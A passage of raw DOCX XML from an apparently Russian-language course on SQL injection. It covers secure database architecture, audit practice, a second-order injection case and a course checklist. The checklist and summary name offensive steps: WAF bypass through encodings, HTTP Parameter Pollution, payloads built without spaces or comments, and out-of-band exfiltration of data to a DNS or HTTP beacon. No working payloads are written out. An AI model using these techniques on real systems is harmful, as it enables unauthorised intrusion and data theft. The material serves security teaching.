          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или выполнение системных команд вроде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Более того, экспертный аудит подразумевает разделение пользователей БД по ролям: один для чтения, другой для записи, третий — для аналитических отчетов с доступом только к представлениям (views) вместо таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование представлений (Views) и хранимых процедур — это не только вопрос производительности, но и мощный инструмент безопасности. Представления позволяют скрыть реальную структуру таблиц и ограничить доступ к чувствительным колонкам, таким как хэши паролей или токены сессий. Даже если злоумышленник получит возможность выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, он увидит лишь те данные, которые вы явно разрешили экспонировать. В сочетании с Row-Level Security (RLS) в PostgreSQL это позволяет ограничить видимость строк на уровне ядра БД, делая невозможным извлечение чужих данных даже при наличии успешной SQL-инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практика аудита: поиск скрытых зависимостей</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>При проведении аудита кода ваша задача — отследить путь данных (taint analysis) от источника (HTTP-запрос) до стока (выполнение запроса в БД). Особое внимание уделяйте местам, где данные проходят через несколько слоев обработки. В современных микросервисах часто встречается ситуация, когда один сервис доверяет другому. Если Service A передает «очищенные» данные в Service B, который вставляет их в запрос без проверки, возникает риск инъекции, которую крайне сложно обнаружить при поверхностном анализе одного компонента.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Анализ динамических идентификаторов. Проверьте все места, где используются имена таблиц или колонок, приходящие извне. Единственный безопасный способ здесь — использование «белых списков» (allow-lists). Если значение не входит в список разрешенных строк, выполнение должно прерываться.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверка конфигурации драйверов. В PHP/PDO убедитесь, что атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PDO::ATTR_EMULATE_PREPARES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> установлен в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Эмуляция подготавливаемых запросов на стороне клиента может привести к специфическим обходам через многобайтовые кодировки, тогда как реальные Prepared Statements на стороне сервера гораздо надежнее.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Валидация типов данных. На уровне схемы БД и на уровне кода должны стоять жесткие ограничения. Если поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ожидается как Integer, оно должно приводиться к этому типу до попадания в логику формирования запроса. Это простейший, но крайне эффективный фильтр против большинства автоматизированных сканеров.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Кейс: Обход фильтрации через архитектурную недоработку</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Рассмотрим реальный сценарий. Приложение использует WAF и параметризацию для всех поисковых запросов. Однако в архитектуре предусмотрена функция «сохранения результатов поиска», которая записывает последний успешный запрос пользователя в таблицу логов для аналитики. Запись в логи происходит через триггер в базе данных или отдельный фоновый процесс. Атакующий формирует запрос, который легитимен для основного поиска (проходит WAF), но содержит скрытую нагрузку, которая срабатывает при выполнении фоновой задачи.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Это классический пример Second-Order SQLi, помноженный на архитектурную слепоту. Защита была сосредоточена на «входе» (API поиска), но полностью отсутствовала на этапе внутренней передачи данных между таблицами. Решением в данном случае является не усиление WAF, а внедрение строгой типизации данных в таблице логов и использование параметризованных запросов даже для внутренних системных операций, которые на первый взгляд кажутся «безопасными», так как работают с данными из собственной БД.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Практическое задание</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проведите ревизию небольшого фрагмента кода на Python (Flask/SQLAlchemy) или PHP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Найдите все места, где используются «сырые» запросы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.execute()</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raw()</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db.query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Перепишите их с использованием параметризации, а если в запросе используются динамические имена колонок — реализуйте механизм белых списков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Спроектируйте схему прав доступа для пользователя БД этого приложения: какие привилегии являются избыточными (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FILE</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SUPER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ALTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рассмотрите возможность внедрения триггеров или RLS для автоматической фильтрации данных по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Чек-лист экспертного аудита</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Все входные параметры типизированы (int, uuid, string с ограничением длины).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Динамические имена таблиц/столбцов проходят через строгий Allow-list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Отключена эмуляция подготавливаемых запросов в настройках драйвера БД.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Приложение подключается к БД под пользователем с минимально необходимыми правами (без доступа к системным таблицам).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Логирование запросов не создает условий для Second-Order атак (данные экранируются перед записью в лог).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Используются механизмы БД (Views, RLS) для изоляции данных между пользователями.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>В следующем модуле мы перейдем к анализу инфраструктурных рисков и разберем, как неправильная настройка самого сервера баз данных может стать катализатором для полной компрометации сети, даже если ваше приложение идеально с точки зрения кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Урок 2.3 — Безопасная архитектура и экспертный аудит кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~7 мин · теория · тест</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Финальные активы курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Готовые материалы для закрепления, презентации курса и его коммерческой упаковки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Чек-лист курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проверить наличие фильтрации спецсимволов и ключевых слов SQL в различных кодировках</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Использовать HTTP Parameter Pollution для разделения полезной нагрузки между параметрами</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Исследовать функционал профиля пользователя на предмет сохранения данных для Second-Order атак</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Настроить DNS-сервер или HTTP-бикон для приема данных через Out-of-band каналы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Протестировать функции СУБД для инициирования внешних сетевых запросов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Сформировать полезную нагрузку без использования пробелов и стандартных комментариев</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Провести аудит исходного кода на предмет использования конкатенации в SQL-запросах</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Реализовать параметризацию запросов во всех модулях взаимодействия с БД</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Настроить ограничения прав доступа для учетной записи СУБД по принципу наименьших привилегий</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Краткий гайд (саммари)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Курс посвящен экспертным методам эксплуатации SQL-инъекций в условиях жестких ограничений безопасности. Основной упор сделан на ручной анализ без применения автоматизированных средств. В рамках обхода WAF рассматриваются техники манипуляции синтаксисом: использование альтернативных кодировок (URL, Hex, Unicode), применение специфических функций СУБД для замены заблокированных операторов и метод HTTP Parameter Pollution. Особое внимание уделяется Second-Order SQLi, где уязвимость проявляется не в момент ввода данных, а при их последующем использовании системой. Студенты изучают цепочки атак, анализируя бизнес-логику приложения. Для ситуаций с отсутствием прямого вывода (Blind) осваиваются Out-of-band (OOB) техники, использующие протоколы DNS и HTTP для эксфильтрации данных на подконтрольный сервер. Завершающий этап обучения фокусируется на защитных мерах: от внедрения Prepared Statements до настройки политик безопасности на уровне ядра СУБД и проведения глубокого аудита кода на языках PHP и Python. Цель курса — сформировать навык выявления скрытых векторов атак, которые игнорируются стандартными сканерами уязвимостей.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Итоговый проект / контрольное задание</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Комплексный аудит и эксплуатация защищенной веб-инфраструктуры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
